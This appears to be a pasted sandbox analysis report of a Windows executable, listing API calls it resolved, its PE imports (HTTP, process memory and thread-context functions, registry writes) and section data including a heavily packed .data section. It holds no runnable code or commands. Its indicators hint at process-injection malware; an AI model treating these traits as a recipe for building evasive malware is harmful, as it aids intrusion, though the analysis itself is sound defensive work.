- "kernel32.dll.WaitForSingleObject",
- "kernel32.dll.WaitNamedPipeW",
- "kernel32.dll.WideCharToMultiByte",
- "kernel32.dll.WriteConsoleInputW",
- "kernel32.dll.WriteConsoleW",
- "kernel32.dll.WriteFile",
- "kernel32.dll.__C_specific_handler",
- "advapi32.dll.AdjustTokenPrivileges",
- "advapi32.dll.AllocateAndInitializeSid",
- "advapi32.dll.CryptAcquireContextA",
- "advapi32.dll.CryptGenRandom",
- "advapi32.dll.CryptReleaseContext",
- "advapi32.dll.FreeSid",
- "advapi32.dll.GetSecurityInfo",
- "advapi32.dll.GetTokenInformation",
- "advapi32.dll.GetUserNameW",
- "advapi32.dll.LookupPrivilegeValueW",
- "advapi32.dll.LsaAddAccountRights",
- "advapi32.dll.LsaClose",
- "advapi32.dll.LsaOpenPolicy",
- "advapi32.dll.OpenProcessToken",
- "advapi32.dll.RegCloseKey",
- "advapi32.dll.RegOpenKeyExW",
- "advapi32.dll.RegQueryValueExW",
- "advapi32.dll.SetEntriesInAclA",
- "advapi32.dll.SetSecurityInfo",
- "iphlpapi.dll.GetAdaptersAddresses",
- "msvcrt.dll.___lc_codepage_func",
- "msvcrt.dll.___mb_cur_max_func",
- "msvcrt.dll.__argv",
- "msvcrt.dll.__doserrno",
- "msvcrt.dll.__getmainargs",
- "msvcrt.dll.__initenv",
- "msvcrt.dll.__iob_func",
- "msvcrt.dll.__lconv_init",
- "msvcrt.dll.__set_app_type",
- "msvcrt.dll.__setusermatherr",
- "msvcrt.dll._acmdln",
- "msvcrt.dll._amsg_exit",
- "msvcrt.dll._beginthreadex",
- "msvcrt.dll._cexit",
- "msvcrt.dll._close",
- "msvcrt.dll._endthreadex",
- "msvcrt.dll._errno",
- "msvcrt.dll._exit",
- "msvcrt.dll._fdopen",
- "msvcrt.dll._fileno",
- "msvcrt.dll._fmode",
- "msvcrt.dll._fstat64",
- "msvcrt.dll._get_osfhandle",
- "msvcrt.dll._initterm",
- "msvcrt.dll._localtime64",
- "msvcrt.dll._lock",
- "msvcrt.dll._lseeki64",
- "msvcrt.dll._onexit",
- "msvcrt.dll._open_osfhandle",
- "msvcrt.dll._read",
- "msvcrt.dll._setjmp",
- "msvcrt.dll._snwprintf",
- "msvcrt.dll._strdup",
- "msvcrt.dll._stricmp",
- "msvcrt.dll._strnicmp",
- "msvcrt.dll._time64",
- "msvcrt.dll._ultoa",
- "msvcrt.dll._umask",
- "msvcrt.dll._unlock",
- "msvcrt.dll._vsnprintf",
- "msvcrt.dll._wchmod",
- "msvcrt.dll._wcsdup",
- "msvcrt.dll._wcsnicmp",
- "msvcrt.dll._wcsrev",
- "msvcrt.dll._wfopen",
- "msvcrt.dll._wmkdir",
- "msvcrt.dll._wopen",
- "msvcrt.dll._write",
- "msvcrt.dll._wrmdir",
- "msvcrt.dll.abort",
- "msvcrt.dll.atoi",
- "msvcrt.dll.calloc",
- "msvcrt.dll.exit",
- "msvcrt.dll.fclose",
- "msvcrt.dll.fflush",
- "msvcrt.dll.fopen",
- "msvcrt.dll.fprintf",
- "msvcrt.dll.fputc",
- "msvcrt.dll.fputs",
- "msvcrt.dll.fread",
- "msvcrt.dll.free",
- "msvcrt.dll.fwprintf",
- "msvcrt.dll.fwrite",
- "msvcrt.dll.getenv",
- "msvcrt.dll.islower",
- "msvcrt.dll.isspace",
- "msvcrt.dll.isupper",
- "msvcrt.dll.iswctype",
- "msvcrt.dll.localeconv",
- "msvcrt.dll.longjmp",
- "msvcrt.dll.malloc",
- "msvcrt.dll.memchr",
- "msvcrt.dll.memcmp",
- "msvcrt.dll.memcpy",
- "msvcrt.dll.memmove",
- "msvcrt.dll.memset",
- "msvcrt.dll.printf",
- "msvcrt.dll.qsort",
- "msvcrt.dll.raise",
- "msvcrt.dll.rand",
- "msvcrt.dll.realloc",
- "msvcrt.dll.setlocale",
- "msvcrt.dll.setvbuf",
- "msvcrt.dll.signal",
- "msvcrt.dll.sprintf",
- "msvcrt.dll.srand",
- "msvcrt.dll.strchr",
- "msvcrt.dll.strcmp",
- "msvcrt.dll.strcoll",
- "msvcrt.dll.strcpy",
- "msvcrt.dll.strerror",
- "msvcrt.dll.strftime",
- "msvcrt.dll.strlen",
- "msvcrt.dll.strncmp",
- "msvcrt.dll.strncpy",
- "msvcrt.dll.strrchr",
- "msvcrt.dll.strstr",
- "msvcrt.dll.strtol",
- "msvcrt.dll.strtoul",
- "msvcrt.dll.strxfrm",
- "msvcrt.dll.towlower",
- "msvcrt.dll.towupper",
- "msvcrt.dll.vfprintf",
- "msvcrt.dll.wcschr",
- "msvcrt.dll.wcscoll",
- "msvcrt.dll.wcscpy",
- "msvcrt.dll.wcsftime",
- "msvcrt.dll.wcslen",
- "msvcrt.dll.wcsncmp",
- "msvcrt.dll.wcsncpy",
- "msvcrt.dll.wcspbrk",
- "msvcrt.dll.wcsrchr",
- "msvcrt.dll.wcstombs",
- "msvcrt.dll.wcsxfrm",
- "psapi.dll.GetProcessMemoryInfo",
- "user32.dll.DispatchMessageA",
- "user32.dll.GetMessageA",
- "user32.dll.MapVirtualKeyW",
- "user32.dll.MessageBoxW",
- "user32.dll.ShowWindow",
- "user32.dll.TranslateMessage",
- "userenv.dll.GetUserProfileDirectoryW",
- "ws2_32.dll.FreeAddrInfoW",
- "ws2_32.dll.GetAddrInfoW",
- "ws2_32.dll.WSADuplicateSocketW",
- "ws2_32.dll.WSAGetLastError",
- "ws2_32.dll.WSAIoctl",
- "ws2_32.dll.WSARecv",
- "ws2_32.dll.WSARecvFrom",
- "ws2_32.dll.WSASend",
- "ws2_32.dll.WSASendTo",
- "ws2_32.dll.WSASetLastError",
- "ws2_32.dll.WSASocketW",
- "ws2_32.dll.WSAStartup",
- "ws2_32.dll.bind",
- "ws2_32.dll.closesocket",
- "ws2_32.dll.gethostname",
- "ws2_32.dll.getpeername",
- "ws2_32.dll.getsockname",
- "ws2_32.dll.getsockopt",
- "ws2_32.dll.htonl",
- "ws2_32.dll.htons",
- "ws2_32.dll.ioctlsocket",
- "ws2_32.dll.listen",
- "ws2_32.dll.select",
- "ws2_32.dll.setsockopt",
- "ws2_32.dll.shutdown",
- "ws2_32.dll.socket",
- "ntdll.dll.RtlNtStatusToDosError",
- "ntdll.dll.NtDeviceIoControlFile",
- "ntdll.dll.NtQueryInformationFile",
- "ntdll.dll.NtSetInformationFile",
- "ntdll.dll.NtQueryVolumeInformationFile",
- "ntdll.dll.NtQueryDirectoryFile",
- "ntdll.dll.NtQuerySystemInformation",
- "kernel32.dll.GetQueuedCompletionStatusEx",
- "kernel32.dll.SetFileCompletionNotificationModes",
- "kernel32.dll.CreateSymbolicLinkW",
- "kernel32.dll.CancelIoEx",
- "kernel32.dll.InitializeConditionVariable",
- "kernel32.dll.SleepConditionVariableCS",
- "kernel32.dll.SleepConditionVariableSRW",
- "kernel32.dll.WakeAllConditionVariable",
- "kernel32.dll.WakeConditionVariable",
- "kernel32.dll.CancelSynchronousIo",
- "kernel32.dll.GetFinalPathNameByHandleW",
- "user32.dll.SetWinEventHook",
- "iphlpapi.dll.ConvertInterfaceIndexToLuid",
- "iphlpapi.dll.ConvertInterfaceLuidToNameW",
- "msvcrt.dll._localtime64_s",
- "kernel32.dll.SetThreadUILanguage",
- "kernel32.dll.CopyFileExW",
- "kernel32.dll.SetConsoleInputExeNameW",
- "kernel32.dll.SortGetHandle",
- "kernel32.dll.SortCloseHandle",
- "uxtheme.dll.ThemeInitApiHook",
- "user32.dll.IsProcessDPIAware",
- "sechost.dll.LookupAccountNameLocalW",
- "advapi32.dll.LookupAccountSidW",
- "sechost.dll.LookupAccountSidLocalW",
- "kernel32.dll.HeapSetInformation",
- "sxs.dll.SxsOleAut32MapConfiguredClsidToReferenceClsid",
- "dwmapi.dll.DwmIsCompositionEnabled",
- "ole32.dll.CoCreateInstance",
- "advapi32.dll.SaferIdentifyLevel",
- "advapi32.dll.SaferComputeTokenFromLevel",
- "advapi32.dll.SaferCloseLevel",
- "ole32.dll.CLSIDFromProgIDEx",
- "ole32.dll.CoGetClassObject",
- "oleaut32.dll.#500"
- ]
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "HttpSendRequestA",
- "address": "0x40911c"
- },
- {
- "name": "HttpOpenRequestA",
- "address": "0x409120"
- },
- {
- "name": "InternetSetOptionA",
- "address": "0x409124"
- },
- {
- "name": "InternetReadFile",
- "address": "0x409128"
- },
- {
- "name": "InternetConnectA",
- "address": "0x40912c"
- },
- {
- "name": "InternetCloseHandle",
- "address": "0x409130"
- },
- {
- "name": "InternetOpenA",
- "address": "0x409134"
- },
- {
- "name": "InternetCrackUrlA",
- "address": "0x409138"
- },
- {
- "name": "InternetQueryOptionA",
- "address": "0x40913c"
- }
- ],
- "dll": "WININET.dll"
- },
- {
- "imports": [
- {
- "name": "MultiByteToWideChar",
- "address": "0x409038"
- },
- {
- "name": "WideCharToMultiByte",
- "address": "0x40903c"
- },
- {
- "name": "FreeLibrary",
- "address": "0x409040"
- },
- {
- "name": "GetProcAddress",
- "address": "0x409044"
- },
- {
- "name": "LoadLibraryA",
- "address": "0x409048"
- },
- {
- "name": "VirtualAlloc",
- "address": "0x40904c"
- },
- {
- "name": "VirtualFree",
- "address": "0x409050"
- },
- {
- "name": "TerminateThread",
- "address": "0x409054"
- },
- {
- "name": "GetExitCodeThread",
- "address": "0x409058"
- },
- {
- "name": "Sleep",
- "address": "0x40905c"
- },
- {
- "name": "LocalFree",
- "address": "0x409060"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x409064"
- },
- {
- "name": "ExitProcess",
- "address": "0x409068"
- },
- {
- "name": "CreateThread",
- "address": "0x40906c"
- },
- {
- "name": "SetThreadExecutionState",
- "address": "0x409070"
- },
- {
- "name": "GetLastError",
- "address": "0x409074"
- },
- {
- "name": "SetErrorMode",
- "address": "0x409078"
- },
- {
- "name": "GetFileSizeEx",
- "address": "0x40907c"
- },
- {
- "name": "GetSystemInfo",
- "address": "0x409080"
- },
- {
- "name": "GetTickCount",
- "address": "0x409084"
- },
- {
- "name": "CreateMutexA",
- "address": "0x409088"
- },
- {
- "name": "GetModuleFileNameW",
- "address": "0x40908c"
- },
- {
- "name": "GetProcessHeap",
- "address": "0x409090"
- },
- {
- "name": "GetWindowsDirectoryW",
- "address": "0x409094"
- },
- {
- "name": "CreateDirectoryW",
- "address": "0x409098"
- },
- {
- "name": "TerminateProcess",
- "address": "0x40909c"
- },
- {
- "name": "ExitThread",
- "address": "0x4090a0"
- },
- {
- "name": "ReadProcessMemory",
- "address": "0x4090a4"
- },
- {
- "name": "GetThreadContext",
- "address": "0x4090a8"
- },
- {
- "name": "SetThreadContext",
- "address": "0x4090ac"
- },
- {
- "name": "HeapFree",
- "address": "0x4090b0"
- },
- {
- "name": "CreateProcessW",
- "address": "0x4090b4"
- },
- {
- "name": "GetCurrentProcessId",
- "address": "0x4090b8"
- },
- {
- "name": "DeleteFileW",
- "address": "0x4090bc"
- },
- {
- "name": "MoveFileW",
- "address": "0x4090c0"
- },
- {
- "name": "GetLongPathNameW",
- "address": "0x4090c4"
- },
- {
- "name": "WaitForSingleObject",
- "address": "0x4090c8"
- },
- {
- "name": "GetTempPathW",
- "address": "0x4090cc"
- },
- {
- "name": "OpenProcess",
- "address": "0x4090d0"
- },
- {
- "name": "GetExitCodeProcess",
- "address": "0x4090d4"
- },
- {
- "name": "ReadFile",
- "address": "0x4090d8"
- },
- {
- "name": "GetModuleHandleA",
- "address": "0x4090dc"
- },
- {
- "name": "GetModuleHandleW",
- "address": "0x4090e0"
- },
- {
- "name": "CreateFileW",
- "address": "0x4090e4"
- },
- {
- "name": "GetFileAttributesW",
- "address": "0x4090e8"
- },
- {
- "name": "CreateToolhelp32Snapshot",
- "address": "0x4090ec"
- },
- {
- "name": "Process32First",
- "address": "0x4090f0"
- },
- {
- "name": "Process32Next",
- "address": "0x4090f4"
- },
- {
- "name": "HeapReAlloc",
- "address": "0x4090f8"
- },
- {
- "name": "HeapAlloc",
- "address": "0x4090fc"
- },
- {
- "name": "GetCommandLineW",
- "address": "0x409100"
- },
- {
- "name": "CloseHandle",
- "address": "0x409104"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "GetLastInputInfo",
- "address": "0x409114"
- }
- ],
- "dll": "USER32.dll"
- },
- {
- "imports": [
- {
- "name": "RegOpenKeyExW",
- "address": "0x409000"
- },
- {
- "name": "ConvertSidToStringSidW",
- "address": "0x409004"
- },
- {
- "name": "CryptDestroyHash",
- "address": "0x409008"
- },
- {
- "name": "CryptHashData",
- "address": "0x40900c"
- },
- {
- "name": "CryptCreateHash",
- "address": "0x409010"
- },
- {
- "name": "CryptGetHashParam",
- "address": "0x409014"
- },
- {
- "name": "CryptReleaseContext",
- "address": "0x409018"
- },
- {
- "name": "CryptAcquireContextW",
- "address": "0x40901c"
- },
- {
- "name": "IsValidSid",
- "address": "0x409020"
- },
- {
- "name": "RegSetValueExW",
- "address": "0x409024"
- },
- {
- "name": "OpenProcessToken",
- "address": "0x409028"
- },
- {
- "name": "GetTokenInformation",
- "address": "0x40902c"
- },
- {
- "name": "RegCloseKey",
- "address": "0x409030"
- }
- ],
- "dll": "ADVAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "CommandLineToArgvW",
- "address": "0x40910c"
- }
- ],
- "dll": "SHELL32.dll"
- },
- {
- "imports": [
- {
- "name": "CoTaskMemFree",
- "address": "0x409144"
- }
- ],
- "dll": "ole32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x00148ad8",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x00000000",
- "icon_hash": null,
- "entrypoint": "0x00404250",
- "timestamp": "2019-03-04 01:08:35",
- "osversion": "5.1",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00007c00",
- "entropy": "6.23",
- "raw_address": "0x00000400",
- "virtual_size": "0x00007b44",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00009000",
- "size_of_data": "0x00002000",
- "entropy": "5.22",
- "raw_address": "0x00008000",
- "virtual_size": "0x00001fbc",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0000b000",
- "size_of_data": "0x0013de00",
- "entropy": "7.97",
- "raw_address": "0x0000a000",
- "virtual_size": "0x0013f920",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0014b000",
- "size_of_data": "0x00000800",
- "entropy": "6.61",
- "raw_address": "0x00147e00",
- "virtual_size": "0x000007b8",
- "characteristics_raw": "0x42000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0000a820",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x0000008c"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0014b000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x000007b8"
- },
- {
- "virtual_address": "0x0000a740",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x0000001c"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00009000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x00000150"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "ded6c839e7f7258224ae021602258361",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 6,
- "versioninfo": []
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment